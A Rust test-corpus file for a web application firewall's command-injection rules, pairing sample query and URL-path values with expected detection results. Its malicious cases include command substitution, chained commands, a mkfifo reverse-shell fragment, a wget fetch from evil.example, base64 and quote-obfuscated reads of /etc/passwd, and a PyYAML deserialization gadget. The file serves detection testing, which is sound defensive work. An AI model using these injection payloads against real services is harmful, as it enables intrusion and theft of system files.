//! RCE / command-injection corpus cases. Field coverage: query + cookies + body.
//! Rules (paranoia): cmd-substitution 1, chained-command 1, shell-path 1,
//! reverse-shell 1, backtick 2, ifs-evasion 2, download-exec 2, windows-shell 2,
//! logical-operator 3.

use crate::{Case, Expect, Field, Module};

pub static CASES: &[Case] = &[
    // ── malicious: one per rule ────────────────────────────────────────────────
    Case {
        id: "rce-cmd-substitution-query",
        module: Module::Rce,
        field: Field::Query { name: "cmd", value: "$(whoami)" },
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-cmd-substitution"],
        desc: "$() command substitution",
    },
    Case {
        id: "rce-chained-command-query",
        module: Module::Rce,
        field: Field::Query { name: "host", value: "target; whoami" },
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-chained-command"],
        desc: "shell separator followed by a known command",
    },
    Case {
        id: "rce-shell-path-query",
        module: Module::Rce,
        field: Field::Query { name: "cmd", value: "/bin/bash -c id" },
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-shell-path"],
        desc: "explicit shell binary path",
    },
    Case {
        id: "rce-reverse-shell-query",
        module: Module::Rce,
        field: Field::Query { name: "cmd", value: "mkfifo /tmp/backpipe" },
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-reverse-shell"],
        desc: "mkfifo reverse-shell idiom (isolated from private-IP rules)",
    },
    Case {
        id: "rce-backtick-query",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "`id`" },
        min_pl: 2,
        expect: Expect::Triggers,
        rules: &["rce-backtick"],
        desc: "backtick command substitution (Warning/PL2)",
    },
    Case {
        id: "rce-ifs-evasion-query",
        module: Module::Rce,
        field: Field::Query { name: "cmd", value: "echo${IFS}test" },
        min_pl: 2,
        expect: Expect::Triggers,
        rules: &["rce-ifs-evasion"],
        desc: "${IFS} space-smuggling (Warning/PL2)",
    },
    Case {
        id: "rce-download-exec-query",
        module: Module::Rce,
        field: Field::Query { name: "cmd", value: "wget http://evil.example/x.sh" },
        min_pl: 2,
        expect: Expect::Triggers,
        // also fires rfi-remote-url (bare http://, PL3) — assert the RCE rule.
        rules: &["rce-download-exec"],
        desc: "remote payload fetch via wget (Warning/PL2); overlaps rfi-remote-url",
    },
    Case {
        id: "rce-windows-shell-query",
        module: Module::Rce,
        field: Field::Query { name: "cmd", value: "cmd /c dir" },
        min_pl: 2,
        expect: Expect::Triggers,
        rules: &["rce-windows-shell"],
        desc: "Windows cmd /c invocation (Warning/PL2)",
    },
    Case {
        id: "rce-logical-operator-query",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "a && b" },
        min_pl: 3,
        expect: Expect::Triggers,
        rules: &["rce-logical-operator"],
        desc: "bare && logical operator (Notice/PL3); also exercises &-encoding in the testkit",
    },
    // ── Base64Flat harvest (Fase 10c) — recall-lock under §6 base64-decode ───────
    // Not a gotestwaf-tracked deferral; pins that the derived channel feeds RCE too.
    Case {
        id: "rce-chained-command-b64",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "OyBjYXQgL2V0Yy9wYXNzd2Q" },
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-chained-command"],
        desc: "base64(`; cat /etc/passwd`) — caught at 10c via base64-decode",
    },
    // ── benign / traps ─────────────────────────────────────────────────────────
    Case {
        id: "rce-benign-cats-and-dogs",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "I like cats and dogs" },
        min_pl: 1,
        expect: Expect::Clean,
        rules: &[],
        desc: "'cat' inside 'cats' with no separator must not chain",
    },
    Case {
        id: "rce-benign-bin-path",
        module: Module::Rce,
        field: Field::Query { name: "path", value: "/usr/local/bin" },
        min_pl: 1,
        expect: Expect::Clean,
        rules: &[],
        desc: "a /bin directory that is not /bin/sh|bash",
    },
    Case {
        id: "rce-benign-prose",
        module: Module::Rce,
        field: Field::Query { name: "desc", value: "fast and reliable service" },
        min_pl: 1,
        expect: Expect::Clean,
        rules: &[],
        desc: "plain prose, no shell metacharacters",
    },
    // ── URL-PATH command injection (Fase 10a B2) — gotestwaf rce-urlpath ──────────
    Case {
        id: "rce-urlpath-chained-ls",
        module: Module::Rce,
        field: Field::Path("/cmd=127.0.0.1 && ls /etc"),
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-chained-command"],
        desc: "`&& ls` in the URL path — gotestwaf rce-urlpath (URL)",
    },
    Case {
        id: "rce-urlpath-chained-cat",
        module: Module::Rce,
        field: Field::Path("/; cat /et'c/pa'ss'wd"),
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-chained-command"],
        desc: "`; cat` in the URL path — gotestwaf rce-urlpath (URL)",
    },
    Case {
        id: "rce-urlpath-backtick",
        module: Module::Rce,
        field: Field::Path("/ax--exec=`id`--remote=origin"),
        min_pl: 2,
        expect: Expect::Triggers,
        rules: &["rce-backtick"],
        desc: "backtick command substitution in the URL path — gotestwaf rce-urlpath (URL, PL2)",
    },
    Case {
        id: "rce-benign-path",
        module: Module::Rce,
        field: Field::Path("/api/v1/users/list"),
        min_pl: 1,
        expect: Expect::Clean,
        rules: &[],
        desc: "an ordinary REST path — must NOT flag now that the path is inspected",
    },
    // ── Fase 10b B2: shell-injection + rce-urlparam broadening ───────────────────
    Case {
        id: "rce-chained-getent-query",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "|getent hosts somehost.example.net&" },
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-chained-command"],
        desc: "`|getent` host lookup (OOB) — gotestwaf shell-injection (URL)",
    },
    Case {
        id: "rce-windows-set-arith-query",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "| set /a 3482*7301" },
        min_pl: 2,
        expect: Expect::Triggers,
        rules: &["rce-windows-shell"],
        desc: "Windows `set /a` arithmetic probe — gotestwaf shell-injection (URL, Warning/PL2)",
    },
    Case {
        id: "rce-yaml-deserialization-query",
        module: Module::Rce,
        field: Field::Query {
            name: "q",
            value: "!!python/object/new:exec [import socket; socket.gethostbyname('h.example.net')]",
        },
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-yaml-deserialization"],
        desc: "PyYAML `!!python/object` deserialization gadget — gotestwaf rce-urlparam (URL)",
    },
    Case {
        id: "rce-benign-set-address",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "please set /address and /account fields" },
        min_pl: 2,
        expect: Expect::Clean,
        rules: &[],
        desc: "`set /address` prose — the `/[ap]\\b` anchor must NOT match (not `set /a `)",
    },
    Case {
        id: "rce-benign-getent-word",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "the contingent budget plan" },
        min_pl: 1,
        expect: Expect::Clean,
        rules: &[],
        desc: "'getent' substring inside 'contingent' without a `[;&|]` separator — must NOT match",
    },
    // ── documented limit (needs §6 de-obfuscation — out of 10b rules-only) ───────
    Case {
        id: "rce-vbscript-space-obfuscated",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "Ev al (\"Ex\"&\"e\"&\"cute(\"\"cmd\"\")" },
        min_pl: 1,
        expect: Expect::ExpectedMiss { until_phase: None },
        rules: &[],
        desc: "VBScript split by spaces/`\"&\"` concat (Ev al, Ex\"&\"e\"&\"cute) — needs §6 de-obfuscation",
    },
];
